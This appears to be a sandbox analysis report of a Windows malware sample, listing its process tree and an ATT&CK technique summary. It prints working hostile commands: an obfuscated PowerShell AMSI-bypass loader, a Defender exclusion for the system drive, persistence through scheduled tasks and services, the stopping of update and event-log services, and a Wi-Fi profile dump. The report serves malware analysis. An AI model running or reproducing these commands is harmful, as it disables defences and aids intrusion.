+''+[Char](121)+''+[Char](83)+''+[Char](105)+''
+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$pGJLtrOUxb,$qNbyexdlHPgKWO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $PTQAtKeJiqS.CreateType();}$uCYewRMsqHnJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+'ro'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.Un'+'s'+'a'+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$IRRkTkPWrSBpRK=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jPtdBsPkTWyCVjbdkiF=rWNoSHwYnwkI @([String])([IntPtr]);$ttwoMDhqFKncjBHCysbhgm=rWNoSHwYnwkI 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$joJWgnTTDmi=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$gaQMctFYLwqKhG=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$qxJzCAuMKBcmkjfBg=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ElhYZqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaQMctFYLwqKhG,$jPtdBsPkTWyCVjbdkiF).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.dl'+[Char](108)+'');$BdgjQiKwxREMtcYjP=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$ElhYZqC,[Object](''+'A'+'ms'+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$RBsNwuxrLP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,4,[ref]$RBsNwuxrLP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BdgjQiKwxREMtcYjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,0x20,[ref]$RBsNwuxrLP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+'rs'+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5316
  3 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID 5992
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OGmlLWAVqpge{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TsNhdFnLxjfEog,[Parameter(Position=1)][Type]$jyDNPwBZvD)$oNgAvRiMVzR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+''+'s'+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+'le'+[Char](100)+''+','+'A'+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$oNgAvRiMVzR.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+'d');$oNgAvRiMVzR.DefineMethod('I'+'n'+''+'v'+'ok'+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[
Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+'t'+','+[Char](86)+'ir'+'t'+'u'+[Char](97)+''+[Char](108)+'',$jyDNPwBZvD,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $oNgAvRiMVzR.CreateType();}$gfxDMLZvsoWkp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$aUnKfREvwPIzwM=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFxtNqoXAbLcrxCPVFX=OGmlLWAVqpge @([String])([IntPtr]);$qtIpSTWHCzQzpOeBuGGPuN=OGmlLWAVqpge 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fLxLQMkrzuH=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$EmGnHNgYXIcANx=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$wdEPlweooazpnKfOR=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ttOjfWX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EmGnHNgYXIcANx,$HFxtNqoXAbLcrxCPVFX).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cvXVWYJuPXJOoVoRH=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$ttOjfWX,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+'e'+''+'r'+'')));$FcgrhMHjCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,4,[ref]$FcgrhMHjCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXVWYJuPXJOoVoRH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,0x20,[ref]$FcgrhMHjCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'WAR'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 3⤵ | PID:964
C:\Users\Admin\AppData\Roaming\CompPkg.exe | C:\Users\Admin\AppData\Roaming\CompPkg.exe | 2⤵
- Executes dropped EXE
PID:5608
C:\Users\Admin\AppData\Roaming\CompPkg.exe | C:\Users\Admin\AppData\Roaming\CompPkg.exe | 2⤵
- Executes dropped EXE
PID:5208
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | 1⤵ | PID:1184
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | 1⤵ | PID:1284
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm | 1⤵ | PID:1300
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | 1⤵ | PID:1364
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | 1⤵ | PID:1408
C:\Windows\system32\sihost.exe | sihost.exe | 2⤵ | PID:2772
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | 1⤵ | PID:1596
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | 1⤵ | PID:1604
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | 1⤵ | PID:1696
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | 1⤵ | PID:1724
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | 1⤵ | PID:1748
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | 1⤵ | PID:1840
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | 1⤵ | PID:1872
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | 1⤵ | PID:1944
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | 1⤵ | PID:1952
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | 1⤵ | PID:2032
C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | 1⤵ | PID:2060
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | 1⤵ | PID:2116
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | 1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | 1⤵ | PID:2320
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | 1⤵ | PID:2492
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | 1⤵ | PID:2500
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p | 1⤵ | PID:2556
C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | 1⤵ | PID:2652
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | 1⤵ | PID:2688
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | 1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | 1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | 1⤵ | PID:2728
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | 1⤵ | PID:2844
C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | 1⤵ | PID:3104
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | 1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3176
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | "C:\Users\Admin\AppData\Local\Temp\primate protocol.exe" | 2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1484
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A" | 3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA=" | 3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
C:\Windows\systemprocess.exe | "C:\Windows\systemprocess.exe" | 3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5768
C:\Windows\SYSTEM32\schtasks.exe | "schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f | 4⤵
- Scheduled Task/Job: Scheduled Task
PID:3340
C:\Windows\SYSTEM32\netsh.exe | "netsh" wlan show profiles | 4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3128
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\" | 4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5664
C:\Windows\host.exe | "C:\Windows\host.exe" | 3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | 4⤵
- Launches sc.exe
PID:2332
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | 4⤵
- Launches sc.exe
PID:5820
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | 4⤵
- Launches sc.exe
PID:4848
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | 4⤵
- Launches sc.exe
PID:1512
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | 4⤵
- Launches sc.exe
PID:5740
C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | 4⤵ | PID:848
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "PROCESS HOST" | 4⤵
- Launches sc.exe
PID:4456
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto" | 4⤵
- Launches sc.exe
PID:896
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | 4⤵
- Launches sc.exe
PID:3200
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "PROCESS HOST" | 4⤵
- Launches sc.exe
PID:1764
C:\Windows\CompPkg.exe | "C:\Windows\CompPkg.exe" | 3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076
C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe" | 4⤵
- Scheduled Task/Job: Scheduled Task
PID:4768
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe | 2⤵
- Suspicious use of WriteProcessMemory
PID:5156
C:\Users\Admin\AppData\Roaming\CompPkg.exe | C:\Users\Admin\AppData\Roaming\CompPkg.exe | 3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5776
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | 1⤵ | PID:3440
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | 1⤵ | PID:3464
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | 1⤵ | PID:3820
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | 1⤵ | PID:3872
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | 1⤵ | PID:3928
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc | 1⤵ | PID:3940
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} | 1⤵ | PID:4196
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc | 1⤵ | PID:4356
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | 1⤵ | PID:3156
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | 1⤵ | PID:5876
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc | 1⤵ | PID:6064
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | 1⤵ | PID:5796
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service | 1⤵
- Modifies data under HKEY_USERS
PID:5084
C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding | 1⤵ | PID:4036
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager | 1⤵ | PID:652
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | 1⤵ | PID:1920
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc | 1⤵ | PID:3620
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | 1⤵ | PID:2404
C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | 1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | 1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | 2⤵
- Launches sc.exe
PID:6088
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | 2⤵
- Launches sc.exe
PID:1560
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | 2⤵
- Launches sc.exe
PID:1992
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | 2⤵
- Launches sc.exe
PID:1628
C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | 2⤵
- Launches sc.exe
PID:3408
C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | 2⤵ | PID:5008
C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | 2⤵ | PID:5268
C:\Windows\system32\dialer.exe | dialer.exe | 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
Network
MITRE ATT&CK Enterprise v16
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (2)
  - Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Impair Defenses (1)
- Modify Registry (1)
- Obfuscated Files or Information (1)
  - Command Obfuscation (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads